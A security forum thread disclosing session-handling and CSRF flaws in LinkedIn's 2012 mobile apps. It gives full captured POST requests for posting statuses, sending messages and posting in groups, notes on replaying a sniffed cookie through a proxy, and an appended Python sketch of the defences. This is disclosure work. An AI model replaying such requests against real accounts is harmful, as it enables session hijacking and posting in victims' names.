Thread: LinkedIn Mobile Apps Bad Security Architecture: A Case Study

  1. #1
    Security Researcher
    Join Date
    Oct 2010
    Location
    Bangalore
    Posts
    14

    LinkedIn Mobile Apps Bad Security Architecture: A Case Study

    Breaking News: 1990's programming mistakes repeated in 2012.


    Introduction

    Well, the title of the post is self-explanatory. It is really sad to see the obvious programming mistakes of the 90's being repeated, by industry giants like LinkedIn, in 2012, when we have so much documented guidance for secure programming. Do we still call this a lack of awareness?


    Responsible Disclosure Timeline

    Vendor Notified: 25th November 2011
    Vendor Response: 28th November 2011
    Conclusion: Not fixed till today (11 April 2012). No further communication from either side.

    Details

    Device Model: iPhone 4S
    Platform: Apple’s iOS 5.0
    LinkedIn App Version: <= 4.3.3 (05 April 2012)
    Note: All LinkedIn apps or sites based on touch.www.linkedin.com are probably vulnerable.



    1. Session cookie transported over HTTP

    Severity: Medium

    Description: The session cookie “lim_auth” is transported over HTTP in clear text. This is the only authentication parameter for LinkedIn services. It is highly susceptible to being sniffed by an attacker with a network packet capture tool like Wireshark.


    2. Session cookie doesn’t expire

    Severity: High

    Description: The session cookie “lim_auth” doesn’t expire for a "long" time, i.e. until the user logs out of the mobile app, and just to remind you, I never log out of my mobile apps because that would mean no push notifications and the annoyance of re-logging in every time on a small keypad. This implies that once an attacker has successfully gained access to a user’s valid session, he can use it for a long period of time until the user has “Signed Out” of the LinkedIn mobile application. An attacker may write an AJAX based custom frontend to easily leverage the JSON based services of LinkedIn. The attacker can then route his service calls through a desktop proxy server that supports a URL Rewrite feature, where it can append headers to the HTTP requests made to LinkedIn, and easily access the services. I have also implemented this scenario for my testing using Charles Web Debugging Proxy.


    3. CSRF on “Status Share” Feature

    Severity: Critical

    Description: The below HTTP POST request is made whenever the user tries to “Share Status” from the LinkedIn mobile app. Since there is no token/crumb bound to this request, the attacker can submit this request as many times as he wants to successfully post arbitrary messages to the victim’s LinkedIn profile without his knowledge.


    Code:
    POST /li/v1/updates HTTP/1.1
    Host: touch.www.linkedin.com
    User-Agent: iphone3_1
    Accept: application/json
    X-UDID: xxx3ac8b568xxxxx1ab238531xxxxx18b0axxxx
    X-System-Version: 5.0
    X-System-Name: iPhone OS
    X-Device-Model: iPhone
    Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx
    X-LI-Track: {"clientVersion":"4.0.3","sessionId":"1326235830768","carrier":"Vodafone India","osVersion":"5.0","locale":"en_US","osName":"iPhone OS","language":"en","model":"iphone4_1"}
    X-App-Version: 4.0.3
    X-User-Language: en
    X-User-Locale: en_US
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Pragma: no-cache
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 71
    
    twitter=false&nc=1326235830768&comment=%21%21%21&visibility=connections


    4. CSRF on “New Message” Feature

    Severity: Critical

    Description: The below HTTP POST request is made whenever the user tries to send a “New Message” to any of his/her connections from the LinkedIn mobile app. Since there is no token/crumb bound to this request, the attacker can submit this request as many times as he wants to successfully send arbitrary and potentially abusive messages to the victim’s connections, or may use it for Social Engineering.


    Code:
    POST /li/v1/messages HTTP/1.1
    Host: touch.www.linkedin.com
    User-Agent: iphone3_1
    Content-Length: 60
    Accept: application/json
    X-UDID: xxx3ac8b568xxxxx1ab238531xxxxx18b0axxxx
    X-System-Version: 5.0
    X-System-Name: iPhone OS
    X-Device-Model: iPhone
    Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx
    X-LI-Track: {"clientVersion":"4.0.3","sessionId":"1326661672150","carrier":"Vodafone India","osVersion":"5.0","locale":"en_US","osName":"iPhone OS","language":"en","model":"iphone4_1"}
    X-App-Version: 4.0.3
    X-User-Language: en
    X-User-Locale: en_US
    Content-Type: application/x-www-form-urlencoded
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Pragma: no-cache
    Connection: keep-alive
    
    
    type=msg&subject=Hello&to=27565348&body=Hii&nc=1326661672150


    5. CSRF on “New Discussion” in Groups Feature

    Severity: Critical

    Description: The below HTTP POST request is made whenever the user tries to start a “New Discussion” in a Group he is already associated with from the LinkedIn mobile app. Since there is no token/crumb bound to this request, the attacker can submit this request as many times as he wants to successfully


    Code:
    POST /li/v1/groups/1772050/posts HTTP/1.1
    Host: touch.www.linkedin.com
    User-Agent: iphone3_1
    Content-Length: 36
    Accept: application/json
    X-UDID: xxx3ac8b568xxxxx1ab238531xxxxx18b0axxxx
    X-System-Version: 5.0
    X-System-Name: iPhone OS
    X-Device-Model: iPhone
    Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx
    X-LI-Track: {"clientVersion":"4.0.3","sessionId":"1326661672150","carrier":"Vodafone India","osVersion":"5.0","locale":"en_US","osName":"iPhone OS","language":"en","model":"iphone4_1"}
    X-App-Version: 4.0.3
    X-User-Language: en
    X-User-Locale: en_US
    Content-Type: application/x-www-form-urlencoded
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Pragma: no-cache
    Connection: keep-alive
    
    
    summary=..&title=..&nc=1326661672150


    6. CSRF on “Send/Accept” in Invitations

    Severity: Critical

    Description: Similar to the exploits explained above.

    Do share your concerns/thoughts through the posts below.
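As an added example, not part of the original post or of LinkedIn's code, the Python below sketches the server-side controls that would close findings 1 to 6: a Secure, bounded-lifetime session cookie, and a per-session anti-CSRF token verified on every state-changing POST before the request is honoured. The secret, session store and captured request are constructed for illustration (the cookie value is the thread's placeholder).

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed values for this example, not LinkedIn's real secret or session store.
SERVER_SECRET = b"example-server-secret-not-real"
SESSION_TTL = 3600  # seconds a lim_auth session stays valid before re-authentication
# Constructed request modelled on the thread's capture; the cookie value is a placeholder.
CAPTURED_POST = ("POST /li/v1/updates HTTP/1.1\r\n"
                 "Host: touch.www.linkedin.com\r\n"
                 "Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx\r\n\r\n"
                 "twitter=false&nc=1326235830768&comment=%21%21%21&visibility=connections")


def csrf_token(session_id):
    """Per-session anti-CSRF token: an HMAC over the session id that a cross-site page
    can neither read nor forge, so it must accompany every state-changing POST."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def session_set_cookie(session_id):
    """Set-Cookie value for findings 1 and 2: Secure keeps lim_auth off plain HTTP,
    Max-Age bounds its lifetime, HttpOnly and SameSite limit script and cross-site use."""
    return (f"lim_auth={session_id}; Secure; HttpOnly; "
            f"Max-Age={SESSION_TTL}; SameSite=Strict; Path=/")


def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def check_post(raw, sessions, now):
    """Return (accepted, reason) for a state-changing POST. `sessions` maps lim_auth
    values to the time each session was issued; `now` is the current time."""
    _, headers, body = parse_request(raw)
    cookies = dict(c.strip().split("=", 1)
                   for c in headers.get("cookie", "").split(";") if "=" in c)
    sid = cookies.get("lim_auth")
    if sid not in sessions:
        return False, "unknown session"
    if now - sessions[sid] > SESSION_TTL:
        return False, "session expired"  # finding 2: sessions must age out
    token = parse_qs(body).get("csrf_token", [""])[0]
    if not hmac.compare_digest(token, csrf_token(sid)):
        return False, "missing or invalid csrf_token"  # findings 3 to 6
    return True, "accepted"
```

Run against the captured request, `check_post` rejects it for lacking a token even though the cookie is valid; the same request with `csrf_token=` appended from `csrf_token(sid)` is accepted until the session ages out.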

  2. #2
    Security Researcher
    Join Date
    May 2011
    Location
    Pune, Maharashtra, India
    Posts
    237
    Blog Entries
    1
    Did you try

    twitter=true

    to see if updates float to Twitter too (in case it's linked)?

    Also, did you try checking the Android app?
    I will download and check if the Android app also has a similar flaw.


  3. #3
    Security Researcher
    Join Date
    Oct 2010
    Location
    Bangalore
    Posts
    14


    Quote Originally Posted by Anant Shrivastava
    Did you try

    twitter=true

    to see if updates float to Twitter too (in case it's linked)?

    Also, did you try checking the Android app?
    I will download and check if the Android app also has a similar flaw.

    Hi Anant,

    Sorry for such a late reply. Yes, the Twitter option shares the content on Twitter; however, it has to be granted access by the user.

    Next, as I said, LinkedIn mobile apps are 95% HTML5, i.e. a mobile website wrapped in a thin native client. And all its mobile apps use www.touch.linkedin.com as the webservice endpoint, which implies all are vulnerable. Having said that, they released their first iPad client 1-2 days back, which at first look seems to be slightly different. I have installed it, will check ASAP and write my findings here.

  4. #4
    hmmm nice. In addition to that, logout really does not expire the session cookies. It just removes them from the phone. So if we grab the old cookie file, we can log into LinkedIn. I have reported this to LinkedIn 6 months ago. Complete details are at: LinkedIn iPhone app does not expire session on logout
